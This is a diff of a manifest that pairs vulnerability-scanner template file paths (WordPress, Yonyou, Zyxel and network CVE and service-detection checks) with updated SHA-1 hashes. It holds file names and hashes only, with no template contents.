-http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml:99637533386f9fbe04fbe17ced9d71a096ef8ee5 -http/vulnerabilities/wordpress/issuu-panel-lfi.yaml:e083d93a56b3860f0e493a1124e126d4468c29bd +http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml:61b823d586ff16fb07ccd9787b1c056ba2ed164c +http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml:458ebfe104ec54e7d6863decfc718f87748c6ac8 +http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml:cb8d2d7af5e5facd923051ec2aa0ea9231c885d7 +http/vulnerabilities/wordpress/hb-audio-lfi.yaml:50013ee088029822531d3c1346626cb081c1be6c +http/vulnerabilities/wordpress/health-check-lfi.yaml:8ebba84e4090edb508be3407981981f4eef63fa3 +http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml:9e9c61ed5a080d5419cee16054772eb3aeded91c +http/vulnerabilities/wordpress/issuu-panel-lfi.yaml:51b2d06d16446411df4d7463f2d9919856199269 http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml:a672f298bdeb7229948e516f0896af0b81dc398c -http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml:9f8c0d213495264cc538ff204621f6531708dff9 -http/vulnerabilities/wordpress/members-list-xss.yaml:0d3cd6dfd62f57f2b87580fd734f0cd0ea038542 -http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml:33998037eea7ef54fc357358d9b658eb7095d198 -http/vulnerabilities/wordpress/mthemeunus-lfi.yaml:4762667c3e9d02444074b101702919519ab1945a -http/vulnerabilities/wordpress/music-store-open-redirect.yaml:9467cf36a54fc7d3e9297304f4384c4e13b0cdd2 -http/vulnerabilities/wordpress/my-chatbot-xss.yaml:f351f78983314c33125570c6cf09b1df9e4d69d6 -http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml:a7d9ae584eaea898633aab6cfb98fbc30cc3e770 -http/vulnerabilities/wordpress/new-user-approve-xss.yaml:c131ac7a92a8eeba645524f1c0bc945af02561aa -http/vulnerabilities/wordpress/newsletter-open-redirect.yaml:2844e738d46a2ea7fd11f3f3d030991fff76ba9f -http/vulnerabilities/wordpress/notificationx-sqli.yaml:1fdbe2ea9d7bdd7082e5624a31b02556d78c96de -http/vulnerabilities/wordpress/pieregister-open-redirect.yaml:01a32babb23c128ff14bafffe515cce41b76f108 -http/vulnerabilities/wordpress/sassy-social-share.yaml:598f684a8766a13380351442dbf6f704fb17a6f8 +http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml:f39a78db8204dee9827f2e1560434b99b2a83710 +http/vulnerabilities/wordpress/members-list-xss.yaml:7becc552d30ccdd3f4a24f0db6671eeb2e23ec2d +http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml:5bf9afb4c6bd175d574ffb05cfda54208aba3032 +http/vulnerabilities/wordpress/mthemeunus-lfi.yaml:615f1e5c1dec0cea555b8a2d0de0c6da0f50a8cb +http/vulnerabilities/wordpress/music-store-open-redirect.yaml:19a0caa1527d6213619ca1d6a9c6e05c25e12ef6 +http/vulnerabilities/wordpress/my-chatbot-xss.yaml:ab209ab1b16dc910d410f4012df8f089ef9a9bf7 +http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml:3e7b4b79585c45315adf963005a8074c89150a37 +http/vulnerabilities/wordpress/new-user-approve-xss.yaml:edc31b5d93acdde70a599cd0d1234ed8adfe906c +http/vulnerabilities/wordpress/newsletter-open-redirect.yaml:1fc6e78bf7b102fe3b2f3273de50459f8671aeda +http/vulnerabilities/wordpress/notificationx-sqli.yaml:70ab9536fd3743288657781a53c01afc3d12aa54 +http/vulnerabilities/wordpress/pieregister-open-redirect.yaml:c4509d71919b91b16c329a1984d8ece2554b314f +http/vulnerabilities/wordpress/sassy-social-share.yaml:d16610c53909be2bb5295c85885e9fe0c1387173 http/vulnerabilities/wordpress/seatreg-redirect.yaml:2353a54f05ef04c1073e5e3476d03a11040efd79 -http/vulnerabilities/wordpress/seo-redirection-xss.yaml:454a44ca4825ebc9bf053fb63d2f6fa3920be38d -http/vulnerabilities/wordpress/shortcode-lfi.yaml:a4831c71d3dfb86172309164483c1d4423010a75 -http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml:c59fc3f1133185c9233cd590084e93f378b25088 -http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml:aecf926e08e399a18b560e4099e00d61db26f2eb +http/vulnerabilities/wordpress/seo-redirection-xss.yaml:a446b4ea21a894d47c7fe4b8d0288943110225f0 +http/vulnerabilities/wordpress/shortcode-lfi.yaml:9aaeb61376487a800b327201398f22a84f6ba1ea +http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml:2753fd03b97abe3e9dedcaa66517fdc993786149 +http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml:bbae10fb33a34acbd7ee893d54f730a38c0d76d2 http/vulnerabilities/wordpress/unauthenticated-duplicator-disclosure.yaml:b2836e48362f17ec2840942b65a71ddfe2863ecb http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:05061021a06dcdfe5e1529457eeef174a4e75a38 http/vulnerabilities/wordpress/watu-xss.yaml:db8c9d286a4ac303da2f7f1b0bef74ad9089a980 -http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:616f3ec0d37d9ab54bc4c5aebf89b7a0c75195d5 -http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:388fba04ac574d751c590a757943cc5a5a1b5c1e -http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:91ffbf4be291968d326e8f1a8ea0aa72c619af81 +http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:e46cde149d6aa8d1bea47d78f500ccc38de644f5 +http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:940b1dfb433e939267005ec19f9929d209365917 +http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:2b8ca1cfe4e5101624e3bdc80cf8cc2cae2496cb http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml:c5939685eaa20b9fa5a6b76a99177cca6d3cfc2f http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml:4afc8c0872e6fae5fa080e585e914177e2fd517a http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:435a0a2546c1c14470b6eec9ff5bfcaf8b4ba9e0 @@ -6366,146 +6366,146 @@ http/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml:eab30e14ab1e1f73cb1 http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml:76df72e230808ceda3fd00315c12df12ffe1b6f4 http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml:b1572bedd080878a2f919d31b489e19bf8806c04 http/vulnerabilities/wordpress/wordpress-user-enum.yaml:70e4f2511e52cfe12c52f5d0844342106c335938 -http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml:6a6c744a3d87635aeb55d5614991a80c592b796f -http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml:64f4926e1c02e4ea9329d29e9f17c517eef78199 -http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml:4f72405183a445c9149dc8a07ab25e4f9413c0f1 -http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml:dc7c452e97e6e6c7b0dd029f4065e953855c2c26 +http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml:db8acccc0365aa4384d909857fcad90906a4cfed +http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml:07c3ad34499d2cdf2a54cd7862bf514087b5e549 +http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml:14a356466d9a0998765a0414ae02b0f80278ce23 +http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml:c4e9276f699611553941be843b3caff3b6ed09fb http/vulnerabilities/wordpress/wordpress-wp-cron.yaml:e4bf70a06dada64989313a8f62969fcdae6348a4 http/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml:2c4d9893ce97f36c462be6d0756dc8c0ff55ddb7 -http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml:6385c78c08f4102afdd5879730a82e59ec50690b +http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml:bf6e115695691df65596fd48513dbcd4eac18801 http/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml:3ade60d4ff8e10e1cc7c00f0cc03037469f55a27 -http/vulnerabilities/wordpress/wp-adaptive-xss.yaml:157f3e2fdd9fed04d917a8ea793bcf01fa484c64 -http/vulnerabilities/wordpress/wp-all-export-xss.yaml:35e14bb77e961fbab46cb894ff860993fd8ed0de +http/vulnerabilities/wordpress/wp-adaptive-xss.yaml:fc0ab0e0fa6d02b625a1db4ccf73ac69d1fc9a92 +http/vulnerabilities/wordpress/wp-all-export-xss.yaml:1f71929c7cb91452e8fd379a650959883a484b22 http/vulnerabilities/wordpress/wp-altair-listing.yaml:39cb441dec3ea5c1304b108a912a49e9f9aabf6a -http/vulnerabilities/wordpress/wp-ambience-xss.yaml:cec1082d931a060bae159a87ea92ea88a490a09b +http/vulnerabilities/wordpress/wp-ambience-xss.yaml:46c3d7c6b18f6371ab883a540e81ea86a66c60bb http/vulnerabilities/wordpress/wp-arforms-listing.yaml:915b512e09023510dcb90b3a8cd320162d5fd077 http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:627962385af666eb211d56f079c66b040d1a8fc7 -http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:fb037b36887d536061e909d40ca51158ddc476e9 -http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:370a490ba04a482c541b95bb133b5035906627b3 +http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:f8802179421f3d2a064cea8dde4ab9940ec94fba +http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:51008f19d68e262165378ef3a52e626f80c76a11 http/vulnerabilities/wordpress/wp-config-setup.yaml:0335a3c317b01127c7a84396c9bcb3c36158efdc -http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml:b3028f0f8ea9d2ac4bf363c816b34389a818b594 +http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml:b8b35f40048a3ec02b1f725b8db90a092eebc843 http/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml:5775caef0cd70c77f969d4f5ee05714467cf5ac0 http/vulnerabilities/wordpress/wp-enabled-registration.yaml:e8c420492bbd4f0dcc3c5815ca2f91af5e9c501b -http/vulnerabilities/wordpress/wp-finder-xss.yaml:f71b588fa55bf65339e0abe7955cecf9eef2e60c -http/vulnerabilities/wordpress/wp-flagem-xss.yaml:bbdf1790aa8aa478f71a10636b39e68922d004ca +http/vulnerabilities/wordpress/wp-finder-xss.yaml:762ef1adfbf1ad45e814a0608abd2e7ea3fe983c +http/vulnerabilities/wordpress/wp-flagem-xss.yaml:e3b049d9df6b10ee2b62769ecb94040a65cb9aff http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml:e95f2fdc3b0c0b508341cd8e29cfe31426064c29 -http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml:486d4c27019f261db99787fb14828fcd0b1b29b2 -http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml:1a01ab89c8498c29e91cca9a72d73cc883c3291b +http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml:aabf77ddf0cfa6d79b36e37713b36fb191f46f53 +http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml:f184753264784aa580cfe9c47e6e3e3c54a10ba5 http/vulnerabilities/wordpress/wp-haberadam-idor.yaml:db736c3475ecbe8a5327c6558256e489fd72e317 http/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml:07a4ba90a2c46554d74145da8996511fc2cef029 -http/vulnerabilities/wordpress/wp-insert-php-xss.yaml:2c7e3c283f7df8f5c8d9dae923f79e4a758d42a4 +http/vulnerabilities/wordpress/wp-insert-php-xss.yaml:a34510c9afee89ea4c7875492e97ee86e325e1f9 http/vulnerabilities/wordpress/wp-iwp-client-listing.yaml:a13476f902f19e8ee9fc7fe6b1d4d6bbf5b87e04 -http/vulnerabilities/wordpress/wp-javospot-lfi.yaml:313502b126d4c26ce2fdb50677183469d019ea59 -http/vulnerabilities/wordpress/wp-knews-xss.yaml:7250b8c23251ab9b1f8c49486fbc7a1bb16323c9 +http/vulnerabilities/wordpress/wp-javospot-lfi.yaml:a8ede8b270170c4874bae5ceab3e26283e732464 +http/vulnerabilities/wordpress/wp-knews-xss.yaml:5b25ed1193cf275bb7de495dc18bc67a1de9c3b7 http/vulnerabilities/wordpress/wp-license-file.yaml:6a89fa155bee798ca05cf18d09df754a48ded7aa http/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml:bca701ce7aff7beac66a3ed8e8d98ae4969a86d4 -http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml:91282ca2b51ab6523eb1ccc3689221e998f9d6fe +http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml:254a610f93d95f1165b7aab94bb5723900497958 http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml:d237cb54a15e438b9c3ae1f1a4757c2941184ec7 -http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml:d6789e2737cf0a5bc630eab71aa4ccc5da3fdf21 -http/vulnerabilities/wordpress/wp-nextgen-xss.yaml:9526897079c9e2ebccfbdbee23239faeaf624104 -http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml:68a1fd6a985559dfbc6a044797d84d68099e348d -http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml:125aad4ed9e3405c47999f7c36555cd8e31770c6 +http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml:6db559ee886dd49423f4ae608dfae49a5affd4d8 +http/vulnerabilities/wordpress/wp-nextgen-xss.yaml:6c36f157e8170617365a5a8810ce96649bb732a2 +http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml:dd88b096b5ce2398df70907c3207d179a2bd4eea +http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml:44723f262b684bca1e0b9c6bb54a323a8dd14efd http/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml:ac0fdbf5b0b03519337c4ed71f27c33faf20757f http/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml:2980bffd4d73554b55a74ba5b0627994ab9fe072 http/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml:2f38a30f695099308f161285e27316e085b150c2 http/vulnerabilities/wordpress/wp-popup-listing.yaml:2813ba8c1728a1202573aea712dd9276df802707 -http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml:691847d48e0ad70fc2d033a816b6a7374b8e8670 +http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml:e84bd8d8695263e452527f3984f5cb97089def53 http/vulnerabilities/wordpress/wp-qards-listing.yaml:47ebd27394d1fb42c199865a34cf6e41d9c8a9dc http/vulnerabilities/wordpress/wp-related-post-xss.yaml:3a28617ff6081824975b7dc26ed543532657692b -http/vulnerabilities/wordpress/wp-securimage-xss.yaml:f1f8b39a1fe1f80f9962b5062c5c5ade793a5640 -http/vulnerabilities/wordpress/wp-security-open-redirect.yaml:ce06f87608abf9addc36719b7c58b03731cdfc85 +http/vulnerabilities/wordpress/wp-securimage-xss.yaml:37f1339f1a7fa63a5777cab136a541010ebd69f3 +http/vulnerabilities/wordpress/wp-security-open-redirect.yaml:a74aa8ae4e1cd2426bc30adcc405577371e793f9 http/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml:4601e0335d325d5abb42ac7b49e02123fff63ceb -http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml:c27f08ab6131b1a8aef88b39e4daf06106c3d8e2 -http/vulnerabilities/wordpress/wp-slideshow-xss.yaml:946c98517e73978db9770e2d08251ff57ba910f9 -http/vulnerabilities/wordpress/wp-socialfit-xss.yaml:74451195a23820b0490e92a36de1eaf0117a30b0 -http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml:b3e43a5c256e02c4c6f0d5246e31093d4e94f8ea +http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml:70759c24c3c8d3be9da26f239ac71c13ccc0a280 +http/vulnerabilities/wordpress/wp-slideshow-xss.yaml:0f38d638e7359041f1ce76189e540065b7d3ba38 +http/vulnerabilities/wordpress/wp-socialfit-xss.yaml:ec5c466b2dcac4ebc225234a9da548c18dd2d1eb +http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml:b4c0a20c53c92bc2939a6c0c8f2272e8f92df13b http/vulnerabilities/wordpress/wp-super-forms.yaml:175ac5300aaa63ac99439a162442d36fb4588d7c http/vulnerabilities/wordpress/wp-sym404.yaml:20343846e467fc03f3345731af11de7c1d2901e9 -http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml:16a220c2027a70bec256b40e2a16b9058b2d6724 +http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml:dabc63707504fa9b6c4acffcb5db4cc2671a0fb7 http/vulnerabilities/wordpress/wp-touch-redirect.yaml:71984d730fb95dd2bf348537c0f9dc7439981a88 -http/vulnerabilities/wordpress/wp-tutor-lfi.yaml:244d9e503fbc5a963c8277574ed2bf7b31d8b493 +http/vulnerabilities/wordpress/wp-tutor-lfi.yaml:6559dba2abe10a3d0edaf039efbde6baaadc9315 http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml:bd89a8fa061dd44f79bb901afd01dae3af5ba039 http/vulnerabilities/wordpress/wp-upload-data.yaml:f771e57ea820c57016b27e2e9c30de6b51a980f3 -http/vulnerabilities/wordpress/wp-vault-lfi.yaml:b1ecaa7f4f26ee397127e3881fb5d3c7b1c67819 -http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:25168b83ad5ab8242f92508339711844aa2c1d8d -http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:82228df408174abf146e50a297bd3564cbe5e79b -http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:21c2618f8ee72094152bfd2278c0e86b58363431 +http/vulnerabilities/wordpress/wp-vault-lfi.yaml:ec05e569dab1818858fd9e180f96c28dd62c3849 +http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:7f4638d5ee7844aca7d98514b6df29ae84b7b70b +http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:8f5fa2256d55c4071b900a60d2a717461ed9c6b7 +http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:d474fc1c96f5c09098bbabefd8e7138020d1592a http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:e42f5be140ce5c56441a8c1daedd49ad1f523da4 http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:49c116832c1363051cf1aabf2b5282350f4bc966 http/vulnerabilities/wordpress/wp-xmlrpc.yaml:e1eb54f2298a43a1264079dccb9ec8cc27981bc4 http/vulnerabilities/wordpress/wpdm-cache-session.yaml:2a06dd6ef037a79077f3997788ab6a25408d6ccf -http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml:9ef79571cc611f364df5794d6bf1ba313e64fd3a +http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml:c62eaa80c61c04100fc997c90e38d3cecb7a8166 http/vulnerabilities/wordpress/wpml-xss.yaml:be8ebc66c2f3443f72bbbfae75b68b450ea3f82f http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml:6cbcd6ec4668c5ed28b25aad4804fb9e91d06b1d -http/vulnerabilities/wordpress/wptouch-open-redirect.yaml:7759b533a9f9217e3b5933fa13428641e9367454 -http/vulnerabilities/wordpress/wptouch-xss.yaml:3cdc7148ce1133d068a6956fdfc8ff31a4b6abc7 -http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml:05029365c2846b71780931d4cdc6c84ce1ad0151 -http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml:dacdfb742a867f98ded6eb9c66587c7f92714abc -http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:41aef3c39f8704f708b0ff7d2b952facc6b214fd -http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:1ac1379d6f765a6008821b965709d63455f1dc81 +http/vulnerabilities/wordpress/wptouch-open-redirect.yaml:ceda882686a89a04ea635ec92795eac9f9bdfbad +http/vulnerabilities/wordpress/wptouch-xss.yaml:e5a158d8001c2d41285ca9ab7c0d9cf41a7a6f8d +http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml:f83958ffb14e4cbea5ebaaa928a9ae19615df61e +http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml:82c982f899ffeb1dc9ee409a10191f7436dedd46 +http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:9e57b135c251528e960e3a620a55778cb5b75f43 +http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:e7e8bf6bd2bc78efd9ceb6d04b5f0b689fb16764 http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f -http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:5cdad439b1340a471900588ca779c1985c865298 +http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:d81ad79707b746a46d8dbf3825df18da17aba5bf http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab http/vulnerabilities /other/sitemap-sql-injection.yaml:7422e5c7bfbd6e0ce3b82ff788c311f7c2e3948e misconfiguration/proxy/open-proxy-external.yaml:e8bd0621346886e2ddd41ca310c609052053cb13 -network/backdoor/backdoored-zte.yaml:3aa481fd5f1c0e8e9853646a7fbca35d927911fa -network/cisco-smi-exposure.yaml:89fcf6f71dff1403e1845205656ae049948574aa +network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f +network/cisco-smi-exposure.yaml:22368c9dd2c17aa863f31268713da67650c498b1 network/clamav-unauth.yaml:795eda3df907879e4b11d230ffe0fffaa6fe022f -network/clickhouse-unauth.yaml:3cc7b0091d65b3beb21e08f357e56f864baac3ab -network/cves/2001/CVE-2001-1473.yaml:a0c9a9f2d0c5505dfaa9d612d7ead72950b0badf +network/clickhouse-unauth.yaml:8d98307e532400528f557b511989c948fe564674 +network/cves/2001/CVE-2001-1473.yaml:1b508a5adba955e833c48e50e2b2eac33282a525 network/cves/2011/CVE-2011-2523.yaml:7547cb75a9cca206a0e70cf2a9c2688c0d96b715 -network/cves/2015/CVE-2015-3306.yaml:0fac2a8c418bd0e61d4bcf7a2311ade9c3fa3af7 -network/cves/2016/CVE-2016-2004.yaml:93b2a159ac689d24eb1ab257ea09769a3b68a263 +network/cves/2015/CVE-2015-3306.yaml:7a79918776523f2c5e1c5c6af3bf7076d3172b2a +network/cves/2016/CVE-2016-2004.yaml:a37bdd523ca82d4b760058896e54ac583b7c1818 network/cves/2016/CVE-2016-3510.yaml:cb0d9aa9f82da78481cc754b5d49606f536c8b2e -network/cves/2017/CVE-2017-3881.yaml:2232a12adeab985f6f26ace5601b085d10ca32bc +network/cves/2017/CVE-2017-3881.yaml:997372695fa85bd4b02e1652f223af173bd813f6 network/cves/2017/CVE-2017-5645.yaml:73fa585ece4f10781721c99f894c4210175ad9df -network/cves/2018/CVE-2018-2628.yaml:745a4bcbf8dacea7659023d8a14b4c58e8a7ca6e -network/cves/2018/CVE-2018-2893.yaml:0a6d9638d166fb7b9c70b66eda35074a3160d35d +network/cves/2018/CVE-2018-2628.yaml:fd4e8a9bd582eacb770f5b403ecc961cd357d976 +network/cves/2018/CVE-2018-2893.yaml:b72472a4dd5932b5f0accf841ea0dab2a922884e network/cves/2020/CVE-2020-11981.yaml:8cf01204e15f9205225a407e3573d04f1a3ebd7d network/cves/2020/CVE-2020-1938.yaml:f42c5ab49582e8cfb2ef258c578b687c67556a9d -network/cves/2020/CVE-2020-7247.yaml:731f878bf6fecab9df6d650f68e391befb479abe -network/cves/2021/CVE-2021-44521.yaml:337b7c516051ab9f27e3a87649c82108597cf54d -network/cves/2022/CVE-2022-0543.yaml:12250c6e9c2b36c2d1c286398819688e03f71817 +network/cves/2020/CVE-2020-7247.yaml:fa40a1f64718f3297ab0c77fb82624604d296237 +network/cves/2021/CVE-2021-44521.yaml:9d7d5fafd4af27eec6c672509604c87559be2cbd +network/cves/2022/CVE-2022-0543.yaml:36be19795b4899c702c6819faecefae477f5b0c9 network/cves/2022/CVE-2022-24706.yaml:c9c9a10852d08107d5818e3ca37d716ebc9936e1 -network/cves/2022/CVE-2022-31793.yaml:e9faa9e6acc71f3b268c39f60f56e4483bd7eb73 +network/cves/2022/CVE-2022-31793.yaml:359508b9480ede53286543c34d407e4173562614 network/cves/2023/CVE-2023-33246.yaml:6cd8eb482b6199a6c7298a99ae2bb0e41f2c4c3f network/default-login/ldap-anonymous-login.yaml:48fa5969a454ef01ca1cc73deb5423f764de8790 -network/detect-addpac-voip-gateway.yaml:22e2a91cf086715101f77677b1c4276f6a11ca98 -network/detect-jabber-xmpp.yaml:2735b8056f61ce2ccea063d2038838bfbed81a54 +network/detect-addpac-voip-gateway.yaml:1b5fa0e5473bea5dce2e3a9b8336171fa5f2b47e +network/detect-jabber-xmpp.yaml:cc8d145eb4c5b307134afc8d31a5e4361f9a163d network/detection/activemq-openwire-transport-detect.yaml:22acd24200c9e83b8e8cdf6bf14f23aafe7f40cd network/detection/apache-activemq-detect.yaml:361d7398a15ef9704ce1092df791cacde4bae754 network/detection/axigen-mail-server-detect.yaml:0287cd9a215e13ee19ee62aee96c2ce29a34c433 network/detection/cisco-finger-detect.yaml:d14118008217854746f94430141d0a183b07e182 network/detection/clamav-detect.yaml:349f639ddeede11fa1b3b5cb8282b7599e68af58 network/detection/cql-native-transport.yaml:1e473ad51441688381eb280ca5d8fe7a4edbade1 -network/detection/dotnet-remoting-service-detect.yaml:28fb6eb778db0bf52f5a584206ac594a241632fb +network/detection/dotnet-remoting-service-detect.yaml:fb9338dba6ec3d7e5cb5a97f220d451c33594c9c network/detection/dropbear-cbc-ciphers.yaml:6d7664dec0349d56bbecb042a516072a2018717f -network/detection/esmtp-detect.yaml:131941efe07b60fb37783c1217ae627fcbe7bbfe +network/detection/esmtp-detect.yaml:a40b86cde437aad247271dbffb12fd488e3b097a network/detection/finger-detect.yaml:8a839bb6f7a03f82a7f7ae64b58a594c80e174f3 network/detection/gnu-inetutils-ftpd-detect.yaml:a1c371553151c3783e6ced2d06e35a01d7b2118a -network/detection/gopher-detect.yaml:e9f7de636c9a2119f09d7f8f1efb96ac6b5c9ef6 -network/detection/ibm-d2b-database-server.yaml:7b31904ae2f31bf25bf25038da09a0592c55fb71 -network/detection/imap-detect.yaml:21031be270bcb9be9f9703efb9caa074dcec9aa0 -network/detection/iplanet-imap-detect.yaml:405f96ff6f8c623c94970886fefece3f3a14b2c7 -network/detection/java-rmi-detect.yaml:9cb7fb54a048135cde559554ed558d1679d9ad79 +network/detection/gopher-detect.yaml:5a0c729755cb87b942ca182fce59aa5bf4435739 +network/detection/ibm-d2b-database-server.yaml:b5b6009287e301640be713c21befc2f65ea638b5 +network/detection/imap-detect.yaml:792e8e90cc05dd94184c7e2e584f55a2e9d0d253 +network/detection/iplanet-imap-detect.yaml:86be0549a3c3778f9cfad1af3aa6e11896759806 +network/detection/java-rmi-detect.yaml:f151378c226280828c43b611398a0189b4c84464 network/detection/microsoft-ftp-service.yaml:1eaa699944fa25cb9acd0c5a436be39cd4374a86 network/detection/mikrotik-ftp-server-detect.yaml:91f68300361533ee2617f8ee2ea26cfb32a34067 -network/detection/mikrotik-routeros-api.yaml:9dd9b2d64369ee6c7b12055597cbb47888c1501d -network/detection/mongodb-detect.yaml:db5c9878c182105556bcd98062b017983a5b61d4 +network/detection/mikrotik-routeros-api.yaml:40bec364f086777eb12078e78cfa6fc612270af5 +network/detection/mongodb-detect.yaml:54a3d1a3b2fc7b15828f4f6c3a5a1b29c39eb4ba network/detection/msmq-detect.yaml:5d977a358a7a5bbc1837ce60bdc31af7df92d59b -network/detection/mysql-detect.yaml:6cf78425430af56bec9a5c143386758c73cde83d -network/detection/openssh-detect.yaml:6cb1e5c12365adc92d27c91692a5d2db0dbf14b7 -network/detection/pgsql-detect.yaml:42791812cc005376a73b8621d09c7d9fe8a58973 -network/detection/pop3-detect.yaml:5f9c7724e984cf9f39248675f8a164551f277905 +network/detection/mysql-detect.yaml:8900446747b3d4583c38aa6c80d0da9e9fa8198b +network/detection/openssh-detect.yaml:beb74b683ec9fddf131c0922240cde0b20559e35 +network/detection/pgsql-detect.yaml:3ee0e00c12c63840e9c2265538513e9db33e8b77 +network/detection/pop3-detect.yaml:63f7b18a6aa15bf1ebb13c26a094c48b3607a203 network/detection/proftpd-server-detect.yaml:a37838e64650accc9a4c8922f1d94040dcd77582 network/detection/rabbitmq-detect.yaml:d9eb2c715fa0173c92f99bad2579506b31de7dde -network/detection/rdp-detect.yaml:d7b98101d101ebc9a219d1e2729a6efdc7168eac -network/detection/redis-detect.yaml:bda8febcacfc294b8b2829c7bffe40fba3a4373e +network/detection/rdp-detect.yaml:e9cb44ffe8ca1d66e350ad8cd2c00bd0bb5768b2 +network/detection/redis-detect.yaml:cb4812f1b206b548090d8b313dbcb6e974bcac54 network/detection/riak-detect.yaml:7c7f000c3a4ed240f66dfd59815f7b78a5ea9550 -network/detection/rpcbind-portmapper-detect.yaml:4c273210ce8a4e202f14f138175a166db294176a -network/detection/rsyncd-service-detect.yaml:c95848165d5726d82a7b49a12cc5396a28d6d91a -network/detection/rtsp-detect.yaml:a0d5f554bc37b316c57302c98174df4dc13663c0 -network/detection/samba-detect.yaml:f22d87e917048d55861d0ba2029541c52cffe9c6 